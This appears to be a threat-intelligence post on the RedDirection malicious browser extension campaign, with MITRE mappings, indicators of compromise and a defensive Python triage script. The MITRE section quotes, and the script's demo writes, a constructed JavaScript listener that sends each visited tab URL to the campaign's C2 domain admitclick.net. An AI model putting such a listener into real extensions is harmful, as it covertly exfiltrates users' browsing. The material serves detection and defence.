RedDirection Malicious Browser Extensions

The RedDirection campaign revealed a network of 18 malicious browser extensions across Chrome and Edge that infected over 2.3 million users by hijacking browsers while providing legitimate functionality. These extensions exploited trust signals such as verified badges and featured placements to silently deploy malware through updates and enable persistent surveillance and redirection attacks. #RedDirection #ColorPicker #BrowserHijacking

Key Points

  • A single “verified” Chrome extension called Color Picker was found to be part of a larger campaign involving 18 malicious extensions spanning Chrome and Edge.
  • The RedDirection campaign infected over 2.3 million users by hijacking their browser activity and sending visited URLs to remote servers for tracking and redirection.
  • Extensions initially appeared legitimate and only introduced malware through silent updates, evading detection by Google and Microsoft’s review processes.
  • The malicious extensions posed as popular tools such as emoji keyboards, video speed controllers, VPN proxies, and weather apps to gain user trust.
  • Each extension used its own command and control subdomain while operating under a centralized attack infrastructure to maintain persistence and control.
  • The campaign utilized browser hijacking techniques to redirect users to fake pages, enabling credential theft and malware distribution without phishing or social engineering.
  • This incident exposes systemic marketplace security failures, demonstrating the weaponization of trust signals like verification badges and featured placements.

MITRE Techniques

  • [T1189] Drive-by Compromise – The extensions silently installed malicious updates that hijacked user browsers without requiring phishing or user interaction (“Due to how Google and Microsoft handle browser extension updates, these malicious versions auto-installed silently”).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Malicious background service workers in browser extensions monitored tab activity and sent browsing URLs to attacker servers (“code that monitors all tab activity… sends your current URL to remote server”).
  • [T1071.001] Application Layer Protocol: Web Protocols – Extensions communicated with command and control servers over HTTPS to receive redirect URLs and send user data (`fetch('https://admitclick.net/api…?')`).
  • [T1566.001] Phishing: Spearphishing Link – Redirecting users to fake login and update pages constitutes a form of phishing through browser redirection (“redirects you to a convincing fake page claiming you need to download a ‘critical Zoom update’”).

Indicators of Compromise

  • [Extension IDs] Malicious browser extensions identified by their unique IDs in Chrome and Edge stores, e.g., Chrome: “kgmeffmlnkfnjpgmdndccklfigfhajen” (Emoji keyboard online), Edge: “jjdajogomggcjifnjgkpghcijgkbcjdi” (Unlock TikTok).
  • [Network Domains] Command and control subdomains used by the extensions include “admitclick.net”, “click.videocontrolls.com”, “c.undiscord.com”, among others linked to the campaign infrastructure.
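A triage check built from the indicators quoted above, added here as an example rather than code from the post or from Koi Security. It assumes extensions are unpacked on disk in the Chrome/Edge profile layout (Extensions/<id>/<version>/) and that a tab listener combined with a network call and broad host permissions is a useful heuristic for URL exfiltration; the two sample extensions it scans are constructed for the demo, not real RedDirection code.

```python
import json
import re
import tempfile
from pathlib import Path

# Indicators taken from the post above: two extension IDs and three C2 domains.
KNOWN_BAD_IDS = {"kgmeffmlnkfnjpgmdndccklfigfhajen", "jjdajogomggcjifnjgkpghcijgkbcjdi"}
KNOWN_BAD_DOMAINS = ("admitclick.net", "click.videocontrolls.com", "c.undiscord.com")
# Assumed heuristic: exfiltrating visited URLs needs a tab/navigation listener, a network call and broad host access.
TAB_LISTENER = re.compile(r"\b(tabs\.onUpdated|tabs\.onActivated|webNavigation\.on\w+)\b")
NET_CALL = re.compile(r"\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b")
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}

def triage_extension(ext_dir: Path, ext_id: str) -> list[str]:
    """Return findings for one unpacked extension version directory (Extensions/<id>/<ver>)."""
    findings = []
    if ext_id in KNOWN_BAD_IDS:
        findings.append("known RedDirection extension id")
    manifest = json.loads((ext_dir / "manifest.json").read_text(encoding="utf-8"))
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    js = "\n".join(p.read_text(encoding="utf-8", errors="ignore") for p in ext_dir.rglob("*.js"))
    hit_domains = [d for d in KNOWN_BAD_DOMAINS if d in js]
    if hit_domains:
        findings.append("references C2 domain(s): " + ", ".join(hit_domains))
    if TAB_LISTENER.search(js) and NET_CALL.search(js) and perms & BROAD_HOSTS:
        findings.append("tab listener + network call + broad host permissions (URL exfil pattern)")
    return findings

def _write_sample(root: Path, ext_id: str, manifest: dict, bg_js: str) -> Path:
    """Write a constructed sample extension (not real RedDirection code) under root/<id>/1.0."""
    d = root / ext_id / "1.0"
    d.mkdir(parents=True)
    (d / "manifest.json").write_text(json.dumps(manifest), encoding="utf-8")
    (d / "bg.js").write_text(bg_js, encoding="utf-8")
    return d

def demo() -> dict[str, list[str]]:
    """Triage one constructed lookalike and one benign extension; return findings keyed by id."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        bad = _write_sample(root, "kgmeffmlnkfnjpgmdndccklfigfhajen",
            {"manifest_version": 3, "permissions": ["tabs"], "host_permissions": ["<all_urls>"],
             "background": {"service_worker": "bg.js"}},
            'chrome.tabs.onUpdated.addListener((id, info, tab) => {\n'
            '  if (info.status === "complete") fetch("https://admitclick.net/api?u=" + tab.url);\n'
            '});\n')
        good = _write_sample(root, "constructedbenignsampleidaaaaaaa",
            {"manifest_version": 3, "permissions": ["storage"], "action": {}},
            'chrome.storage.local.set({theme: "dark"});\n')
        return {p.parent.name: triage_extension(p, p.parent.name) for p in (bad, good)}
```

To run it against a real profile, call triage_extension on each Extensions/<id>/<version> directory with the id taken from the path; any non-empty result is worth a manual look, and a known-id hit is worth removing the extension and reviewing which sites were visited while it was installed.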

Read more: https://blog.koi.security/google-and-microsoft-trusted-them-2-3-million-users-installed-them-they-were-malware-fb4ed4f40ff5